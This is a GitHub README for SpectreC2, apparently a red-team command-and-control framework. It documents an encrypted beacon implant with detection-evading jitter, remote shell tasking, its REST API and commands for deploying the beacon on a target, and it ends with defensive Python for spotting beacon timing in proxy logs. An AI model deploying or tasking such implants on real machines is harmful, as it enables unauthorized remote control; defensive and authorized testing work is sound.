pythernel/SpectreC2

GitHub: pythernel/SpectreC2

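SpectreC2 is a cross-platform command and control framework with AES-256-GCM encrypted communications, designed for red team operations and penetration testing scenarios.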

Stars: 0 | Forks: 0

# 👻 SpectreC2

**Encrypted command and control framework with AES-256-GCM beaconing, multi-platform implants, and a REST API**

![Python](https://img.shields.io/badge/python-3.9%2B-blue?style=flat-square&logo=python) ![Version](https://img.shields.io/badge/version-1.0.0-red?style=flat-square) ![License](https://img.shields.io/badge/license-MIT-green?style=flat-square) ![Platform](https://img.shields.io/badge/platform-cross--platform-lightgrey?style=flat-square)

```
╔═══════════════════════════════════════════════════════╗
║                                                       ║
║  ███████ ██████ ███████ ██████ ████████ ██████        ║
║  ██ ██ ██ ██ ██ ██ ██                                 ║
║  ███████ ██ █████ ██ ██ ██████                        ║
║  ██ ██ ██ ██ ██ ██ ██                                 ║
║  ███████ ██████ ███████ ██████ ██ ██ ██               ║
║                                                       ║
║  Encrypted Command & Control Framework                ║
║                                                       ║
╚═══════════════════════════════════════════════════════╝
```

## Table of Contents

- [Overview](#overview)
- [Features](#features)
- [Architecture](#architecture)
- [Quick Start](#quick-start)
- [API Documentation](#api-documentation)
- [Example Usage](#example-usage)
- [Project Structure](#project-structure)
- [Screenshots](#screenshots)
- [License](#license)
- [Credits](#credits)

## Overview

**SpectreC2** is a lightweight encrypted command and control framework designed for operational-security tasks. All communication between the server, the client, and the implant is encrypted with **AES-256-GCM**, with a separate nonce for each message and optional HMAC-SHA256 integrity verification.

The framework consists of three core components:

| Component | Description |
|-----------|-------------|
| **C2 Server** | HTTP/JSON REST API server. Manages beacons, tasks, listeners, and persistence through SQLite. |
| **Admin Client** | CLI-based operator console. Provides an interactive shell, task dispatch, and beacon enumeration. |
| **Implant** | Lightweight Python beacon. Handles registration, check-in, task execution, and returning results. |

## Features

- **AES-256-GCM encryption**: all beacon data is encrypted with a 256-bit key and a 12-byte random nonce
- **HMAC-SHA256 integrity**: optional message signing to detect tampering
- **Multi-platform implant**: the Python beacon runs on Windows, Linux, and macOS with no native dependencies
- **REST API**: a complete HTTP/JSON API for automation and integration
- **SQLite backend**: persistent storage for beacons, tasks, and listeners
- **Interactive shell**: inline shell sessions with streamed output
- **Listener management**: create and manage multiple C2 listeners dynamically
- **Configurable beaconing**: adjustable sleep interval and jitter, intended to evade C2 traffic detection
- **Integrity check**: the beacon reports the user's integrity level (admin/user)
- **CORS enabled**: cross-origin support for web-based admin panels
- **Single-file implant**: the beacon can run as a standalone script, with no pip install required

## Architecture

```
┌─────────────────┐      AES-256-GCM      ┌──────────────────┐
│                 │ ◄───────────────────► │                  │
│  Admin Client   │       REST API        │    C2 Server     │
│  (CLI / Web)    │                       │  :8443 /api/*    │
│                 │                       │                  │
└─────────────────┘                       └────────┬─────────┘
                                                   │
                                         ┌─────────┴──────────┐
                                         │                    │
                                         │   SQLite (data/)   │
                                         │  beacons / tasks   │
                                         │     listeners      │
                                         └────────────────────┘
                                                   ▲
                                                   │  AES-256-GCM
                                                   │  HTTPS polling
                                                   │
                                         ┌─────────┴──────────┐
                                         │                    │
                                         │  Implant / Beacon  │
                                         │  (Python, cross-   │
                                         │     platform)      │
                                         │                    │
                                         └────────────────────┘
```

### Communication Flow

1. **Implant registration**: the implant sends a system fingerprint, encrypted with AES-256-GCM, to `/api/beacon/register`
2. **Beaconing (check-in)**: the implant polls `/api/beacon/checkin` at a configurable interval (with jitter)
3. **Task dispatch**: the operator sends commands to `/api/task/create` through the CLI or the API
4. **Task execution**: the implant fetches pending tasks, executes them, and sends the results to `/api/beacon/result`
5. **Admin authentication**: the client authenticates through `/api/auth` to receive a session token

## Quick Start

### Prerequisites

- Python 3.9+
- `pip` (Python package manager)

### 1. Install dependencies

```
pip install -r requirements.txt
```

### 2. Start the C2 Server

```
python -m server.c2_server --host 0.0.0.0 --port 8443 --password spectre
```

On startup the server generates a unique admin token and prints it to the console.

### 3. Start the Admin Client

```
python -m client.c2cli http://127.0.0.1:8443 spectre
```

### 4. Create a Listener

```
c2> listener default 8443
[+] Listener 'default' created
[+] Beacon key: aB3dEfGhIjKlMnOpQrStUvWxYz...
```

### 5. Deploy the Beacon

```
# On the target machine:
python beacon.py http://:8443 --sleep 5 --jitter 0.3
```

Within a few seconds the beacon registers, starts checking in, and appears in the Admin Client.

### 6. List Beacons and Issue Commands

```
c2> beacons
ID                             HOSTNAME           USER            OS                   LAST SEEN
------------------------------ ------------------ --------------- -------------------- -------------------------
DESKTOP-abc123                 DESKTOP-ABC123     operator        Windows 10           2026-06-07T14:23:11
c2> task DESKTOP-abc123 shell whoami
[>] Task a1b2c3d4 sent to DESKTOP-abc123
```

## API Documentation

All endpoints return JSON. Requests and responses between the beacon and the server are additionally encrypted with AES-256-GCM on top of these payloads.

### Authentication

#### `POST /api/auth`

Authenticate as an operator and receive a session token.

**Request:**

```
{
  "password": "spectre"
}
```

**Response:**

```
{
  "status": "ok",
  "token": "abcdef1234567890abcdef1234567890"
}
```

### Beacons

#### `POST /api/beacon/register`

Register a new beacon with system metadata.

**Request:**

```
{
  "id": "DESKTOP-abc123-a1b2c3",
  "hostname": "DESKTOP-ABC123",
  "username": "operator",
  "os": "Windows 10",
  "arch": "AMD64",
  "internal_ip": "192.168.1.100",
  "external_ip": "1.2.3.4",
  "pid": 12345,
  "integrity": "admin"
}
```

**Response:**

```
{
  "status": "ok",
  "beacon_id": "DESKTOP-abc123-a1b2c3"
}
```

#### `POST /api/beacon/checkin`

Beacon check-in. Returns the tasks waiting to be executed.

**Request:**

```
{
  "id": "DESKTOP-abc123-a1b2c3"
}
```

**Response:**

```
{
  "status": "ok",
  "tasks": [
    {
      "id": "a1b2c3d4",
      "command": "shell",
      "args": "whoami"
    }
  ]
}
```

#### `POST /api/beacon/result`

Submit the result of a task.

**Request:**

```
{
  "task_id": "a1b2c3d4",
  "result": "DESKTOP-ABC123\\operator\n",
  "error": ""
}
```

**Response:**

```
{
  "status": "ok"
}
```

#### `GET /api/beacons`

List all active beacons.

**Response:**

```
{
  "beacons": [
    {
      "id": "DESKTOP-abc123-a1b2c3",
      "hostname": "DESKTOP-ABC123",
      "username": "operator",
      "os_info": "Windows 10",
      "internal_ip": "192.168.1.100",
      "external_ip": "1.2.3.4",
      "pid": 12345,
      "arch": "AMD64",
      "integrity": "admin",
      "first_seen": "2026-06-07T14:20:00+00:00",
      "last_seen": "2026-06-07T14:23:11+00:00",
      "active": 1
    }
  ]
}
```

#### `GET /api/beacons/{beacon_id}`

Get the details of a specific beacon.

**Response:**

```
{
  "id": "DESKTOP-abc123-a1b2c3",
  "hostname": "DESKTOP-ABC123",
  "username": "operator",
  "os_info": "Windows 10",
  "first_seen": "2026-06-07T14:20:00+00:00",
  "last_seen": "2026-06-07T14:23:11+00:00",
  "active": 1
}
```

#### `GET /api/beacons/{beacon_id}/tasks`

List all tasks for a beacon (past and present).

**Response:**

```
{
  "tasks": [
    {
      "id": "a1b2c3d4",
      "beacon_id": "DESKTOP-abc123-a1b2c3",
      "command": "shell",
      "args": "whoami",
      "status": "completed",
      "result": "DESKTOP-ABC123\\operator\n",
      "error": "",
      "created_at": "2026-06-07T14:22:00+00:00",
      "completed_at": "2026-06-07T14:22:01+00:00"
    }
  ]
}
```

### Tasks

#### `POST /api/task/create`

Create a new task for a beacon. **Requires the `X-Token` header.**

**Request:**

```
{
  "beacon_id": "DESKTOP-abc123-a1b2c3",
  "command": "shell",
  "args": "whoami"
}
```

**Response:**

```
{
  "status": "ok",
  "task_id": "a1b2c3d4"
}
```

### Listeners

#### `GET /api/listeners`

List all active listeners.

**Response:**

```
{
  "listeners": [
    {
      "name": "default",
      "bind_host": "0.0.0.0",
      "bind_port": 8443,
      "protocol": "http",
      "created_at": "2026-06-07T14:15:00+00:00",
      "active": 1
    }
  ]
}
```

#### `POST /api/listener/create`

Create a new listener. Generates a unique AES-256-GCM key for beacon encryption. **Requires the `X-Token` header.**

**Request:**

```
{
  "name": "external",
  "host": "0.0.0.0",
  "port": 8443,
  "protocol": "http"
}
```

**Response:**

```
{
  "status": "ok",
  "key": "aB3dEfGhIjKlMnOpQrStUvWxYz0123456789+/ABCDEFGH=="
}
```

## Example Usage

### Interactive Shell Session

```
# Terminal 1: start the server
$ python -m server.c2_server --host 0.0.0.0 --port 8443 --password spectre
╔══════════════════════════════════════╗
║  SpectreC2 v1.0                      ║
║  Encrypted C2 Framework              ║
║══════════════════════════════════════║
║  Host: 0.0.0.0                       ║
║  Port: 8443                          ║
╚══════════════════════════════════════╝
[14:15:00] | INFO | Listening on 0.0.0.0:8443
```

```
# Terminal 2: start the admin client
$ python -m client.c2cli http://127.0.0.1:8443 spectre
[+] Authenticated
SpectreC2 Client — type 'help' for commands
c2> listener default 8443
[+] Listener 'default' created
[+] Beacon key: aB3dEfGhIjKlMnOpQrStUvWxYz...
```

```
# Terminal 3: deploy the beacon on the target
$ python implant/beacon.py http://10.0.0.5:8443 aB3dEfGhIjKlMnOpQrStUvWxYz... --sleep 3 --jitter 0.2
[+] Beacon DESKTOP-abc123-a1b2c3 active
```

```
# Back in Terminal 2: interact with the beacon
c2> beacons
ID                             HOSTNAME           USER            OS                   LAST SEEN
------------------------------ ------------------ --------------- -------------------- -------------------------
DESKTOP-abc123                 DESKTOP-ABC123     operator        Windows 10           2026-06-07T14:23:11
c2> task DESKTOP-abc123 shell whoami
[>] Task a1b2c3d4 sent to DESKTOP-abc123
c2> shell DESKTOP-abc123
[*] Interactive shell to DESKTOP-abc123
[*] Type 'exit' to quit
c2@DESKTOP> ipconfig
[>] Task b2c3d4e5 sent to DESKTOP-abc123
c2@DESKTOP> systeminfo | findstr "OS"
[>] Task c3d4e5f6 sent to DESKTOP-abc123
c2@DESKTOP> exit
```

### Programmatic API Usage (Python)

```
import requests

server = "http://127.0.0.1:8443"

# Authenticate
r = requests.post(f"{server}/api/auth", json={"password": "spectre"})
token = r.json()["token"]
print(f"Token: {token}")

# List beacons
headers = {"X-Token": token}
r = requests.get(f"{server}/api/beacons", headers=headers)
for b in r.json().get("beacons", []):
    print(f" {b['id']} — {b['hostname']} ({b['internal_ip']})")

# Create a task
r = requests.post(f"{server}/api/task/create", headers=headers, json={
    "beacon_id": "DESKTOP-abc123-a1b2c3",
    "command": "shell",
    "args": "whoami"
})
print(f"Task ID: {r.json()['task_id']}")
```

### cURL Examples

```
# Authenticate
curl -s http://127.0.0.1:8443/api/auth \
  -X POST -H "Content-Type: application/json" \
  -d '{"password":"spectre"}'

# List beacons
curl -s http://127.0.0.1:8443/api/beacons \
  -H "X-Token: "

# Create a task
curl -s http://127.0.0.1:8443/api/task/create \
  -X POST \
  -H "Content-Type: application/json" \
  -H "X-Token: " \
  -d '{"beacon_id":"DESKTOP-abc123-a1b2c3","command":"shell","args":"whoami"}'

# Create a listener
curl -s http://127.0.0.1:8443/api/listener/create \
  -X POST \
  -H "Content-Type: application/json" \
  -H "X-Token: " \
  -d '{"name":"external","port":8443}'
```

## Project Structure

```
SpectreC2/
├── crypto.py              # AES-256-GCM encryption module
├── requirements.txt       # Python dependencies
├── server/
│   ├── __init__.py
│   ├── c2_server.py       # HTTP/JSON C2 server (REST API)
│   └── database.py        # SQLite persistence layer
├── client/
│   ├── __init__.py
│   └── c2cli.py           # CLI admin client (interactive)
├── implant/
│   ├── __init__.py
│   └── beacon.py          # Cross-platform Python beacon
└── README.md
```

## Screenshots

### Server Startup

```
[Console output placeholder — server banner with host, port, and token]
```

### Admin Client: Beacon List

```
[Console output placeholder — tabular display of active beacons]
```

### Interactive Shell Session

```
[Console output placeholder — interactive shell commands and output]
```

## License

Distributed under the MIT License. See `LICENSE` for more information.

## Credits

**SpectreC2** was built for educational and authorized security testing purposes only.

- **Encryption backend:** [cryptography.io](https://cryptography.io), which provides AES-256-GCM through `hazmat.primitives.ciphers.aead.AESGCM`
- **Inspiration:** Project Havoc, Covenant, Sliver, Mythic (the modern C2 ecosystem)

**Use responsibly. Only test systems you own or have written authorization to assess.**
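
For defenders, the check-in loop described under Communication Flow and the `--sleep`/`--jitter` options leave a timing signature in proxy logs. The following is an added detection example, not part of the SpectreC2 code base; it assumes jitter is a bounded fraction of the sleep interval, and the log format, client addresses, and thresholds are constructed for illustration.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Beacon-side endpoints named in the README's API documentation.
BEACON_PATHS = {"/api/beacon/register", "/api/beacon/checkin", "/api/beacon/result"}

# Constructed proxy log (not real traffic): "<time> <client> <method> <host> <path>"
SAMPLE_LOG = """\
2026-06-07T14:20:00 10.0.0.23 POST 10.0.0.5:8443 /api/beacon/register
2026-06-07T14:20:01 10.0.0.40 POST intranet.example /api/search
2026-06-07T14:20:02 10.0.0.40 POST intranet.example /api/search
2026-06-07T14:20:03 10.0.0.40 POST intranet.example /api/search
2026-06-07T14:20:05 10.0.0.23 POST 10.0.0.5:8443 /api/beacon/checkin
2026-06-07T14:20:10 10.0.0.23 POST 10.0.0.5:8443 /api/beacon/checkin
2026-06-07T14:20:14 10.0.0.23 POST 10.0.0.5:8443 /api/beacon/checkin
2026-06-07T14:20:20 10.0.0.23 POST 10.0.0.5:8443 /api/beacon/checkin
2026-06-07T14:20:25 10.0.0.23 POST 10.0.0.5:8443 /api/beacon/checkin
2026-06-07T14:20:29 10.0.0.23 POST 10.0.0.5:8443 /api/beacon/checkin
2026-06-07T14:20:35 10.0.0.23 POST 10.0.0.5:8443 /api/beacon/checkin
2026-06-07T14:20:40 10.0.0.23 POST 10.0.0.5:8443 /api/beacon/checkin
2026-06-07T14:21:30 10.0.0.40 POST intranet.example /api/search
2026-06-07T14:25:00 10.0.0.40 POST intranet.example /api/search
2026-06-07T14:25:02 10.0.0.40 POST intranet.example /api/search
2026-06-07T14:31:00 10.0.0.40 POST intranet.example /api/search
"""

def find_beacons(log, min_events=6, max_spread=0.5):
    """Flag (client, host, path) POST flows whose gaps stay in a band around their median."""
    flows = defaultdict(list)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[2] == "POST":
            flows[(parts[1], parts[3], parts[4])].append(datetime.fromisoformat(parts[0]))
    findings = []
    for (client, host, path), stamps in flows.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median = statistics.median(gaps)
        # Largest deviation from the median gap, as a fraction of it: a fixed
        # sleep with bounded jitter keeps this small; interactive traffic does not.
        spread = max(abs(g - median) for g in gaps) / median if median else float("inf")
        if spread <= max_spread:
            findings.append({"client": client, "host": host, "path": path,
                             "median_s": median, "spread": round(spread, 2),
                             "known_path": path in BEACON_PATHS})
    return findings
```

The timing test still fires if the endpoint paths are renamed; `known_path` only raises confidence when the documented paths are visible in the log.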